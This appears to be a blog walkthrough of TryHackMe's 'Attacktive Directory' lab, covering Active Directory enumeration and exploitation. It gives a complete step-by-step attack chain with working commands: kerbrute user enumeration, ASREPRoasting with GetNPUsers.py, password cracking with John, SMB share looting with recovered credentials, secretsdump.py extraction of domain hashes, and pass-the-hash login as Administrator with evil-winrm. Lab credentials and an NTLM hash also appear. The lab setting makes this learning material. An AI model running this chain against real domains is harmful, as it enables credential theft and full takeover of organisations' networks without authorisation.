#beginners #activedirectory #AD #enumeration #exploitation
As you may be aware the latest ( well for a number of years actually) the buzz has been about AD.
Active Directory enumeration and exploitation is a fantastic skill set to possess.
Below are details steps of enumerating AD and then exploiting. Just always remember enum, enum, enum at every stage. There is a quick guide section at bottom of the page if you want quick notes.
Lets begin
1. NMAP scan
we are going to start with an nmap scan
nmap 10.10.61.211 -sV -Pn -A
Lets go through the results:
- port 53 is open, this is very important for AD set ups
- we have a Microsoft IIS running, so no doubt a server with higher privileges and a config file somewhere with credentials
- Port 88 kerberos — means we can enumerate for valid users
- port 389 ldap — we can potentially run ldap tools against it
- ports 135,139,445 — all SMB and RPC ports, perfect for enumerating information from using enum4linux, smbclient, smbmap and more
- Very importantly ports 3389 and 5985 are also open — This means RDP is potentially accessible (if users are part of that particular group) and we can run tools like evil-winrm against port 5985
We have also gathered the following information:
- we know the domain: spookysec.local
- so lets first add this to our /etc/hosts
- it is important to add to /etc/hosts as otherwise you will not get the results intended.
2. Edit /etc/hosts
sudo nano /etc/hosts
3. Enumeration
Our next time to get as much information as possible, ideally we are looking for credentials (long shot i know) but looking for usernames (including the format of the username) is something very possible.
3a. Website Enumeration
Steps:
- check out the website — snoop around
- check out source code — sometimes credentials are left in error
- run a directory scan -may need to run using different wordlists, may also need to specify the extension ie. php, txt etc
3b. SMB/RPC Enumeration
smbmap:
smbmap -H 10.10.61.211
smbclient:
smbclient -L \\\\10.10.61.211\\
enum4linux
enum4linux 10.10.61.211
- information here is quite useful so make note of it.
4. Enum users / password spray
At this stage one of two things will happen:
- you either have some usernames (found from earlier stages)
- or you will be using a username list to find them
As you can imagine the latter is not ideal as lockout policies may stop you in your tracks.
Nevertheless, lets progress — for this I am using a modified list provided by THM.
The tool we will use is called: Kerbrute
Just to note: you can also use crackmapexec and other tools for this stage
4a. Kerbrute
./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.61.211 /tmp/userlist.txt
Whats going on with the command:
- we need to set the “userenum” flag
- -d for domain
- — dc for ip address ( can also insert domain here again)
- and the username list
So a few things should immediately jump out to us
- 1. svc-admin (and the dumped hash)
- 2. backup username
- we can attempt to crack this hash using John, sadly I had no luck
- the main thing is we have some valid usernames including the actual format of names used.
5. Next stage — abuse a feature within Kerberos
Now we have some valid usernames we can password spray using crackmapexec or similar tool, or rather we can use a script from Impacket called GetNPUsers.py.
Why: (source TryHackMe.com)
- we want to abuse a feature within Kerberos with an attack method called ASREPRoasting
What is that: (source TryHackMe.com)
- it is when a user account has the privilege “Does not require Pre-Authentication” set
- meaning — that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account. Thus meaning we can get the user hash!
As it stands we have: svc-admin and backup + others usernames
6. GetNPUsers.py
python3 GetNPUsers.py spookysec.local/ -dc-ip 10.10.61.211 -usersfile /tmp/users_list_example.txt -format john -outputfile /tmp/crackme.txt
python3 GetNPUsers.py spookysec.local/svc-admin -outputfile crackme.txt
- pay attention to the format of the command, as it can be funny and not run as intended. I struggled with using — dc hostname.
- ok that is fine, so that means svc-admin does, so lets check out the output file
- lets use john to crack this hash
7. JtR
john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt
- brilliant we have a password!
8. Enumeration! (again)
remember what I said at the start, anytime we get some valid credentials we need to go back to square one.
Square one is:
- smbclient
- smbmap
- rdp / winrm attempts
- login portals ? — lets try these credentials
smbmap:
smbmap -u svc-admin -p management2005 -H 10.10.61.211
smbclient:
smbclient -L \\\\10.10.61.211\\ --user svc-admin
smbclient -L spookysec.local --user svc-admin
Instantly, the backup directory should be sticking out like a sore thumb to us.
9. Enumerating further — for some credentials
Lets check it out, again you can use smbmap/ smbclient and even crackmapexec (CME)
If you intend to use smbclient, you need to remove the -L (as that is for listing) see below the syntax
smbclient \\\\spookysec.local\\backup --user svc-admin
smbclient \\\\10.10.61.211\\backup --user svc-admin
- if you encounter an error like: “Not enough ‘\’ characters in service” you havent put in enough \\. It should be as shown in above text box.
we find the following in the backup directory share
it looks like it is base64 encoded, lets decode it
echo YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw | base64 -d
looks like we have some credentials for user backup
10. Privileged
It is safe to presume that user backup will have privileged access, I mean why else would it be called backup. It must be backing up important stuff surely.
Since we have the credentials, we can use a tool called Secretsdump.py (from Impacket) to access hashes of the administrator (or similar) account which has full rights over everything on the domain
10a. Secretsdump.py
is a script used to extract credentials and secrets from a system.
sudo python3 secretsdump.py -just-dc backup@spookysec.local
- and provide the password when prompted (note you need to run as sudo)
WOOHOO!!
we have the hash, just you are aware — the hash we require is the second part as shown below (highlighted in burgundy)
What can we do with this:
- we will do something called Pass the Hash (PtH) whereby we just pass this hash directly into the program to gain access to the system as you will see next
11. Pass the Hash (PtH)
How does it all work, lets see — using Evil-winrm
evil-winrm -i 10.10.61.211 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
- notice we have not provided a password, but instead the hash of the user administrator
and there we have it! we are now administrator!
A quick guide:
- nmap scan — get domain info etc
- add to /etc/hosts
- start enumeration — website, smb,rpc,ldap, dns
- validate usernames -kerbrute or password spray
- with valid names, next ASREPROAST using GetNPUsers.py script
- use JtR to crack the hash you find
- back to square 1: enumerate — using the credentials you have log in via smbclient, smbmap etc for the shares
- Can you find any useful credentials of privileged account users, if so
- use secretsdump.py with the new set of credentials as an privileged user will have access to hashes for administrator account
- using the hash from admin account , log in via RDP or evil-winrm using Pass the Hash
Sources and credits:
huge thanks to TryHackMe on the brilliant Attacktive Directory room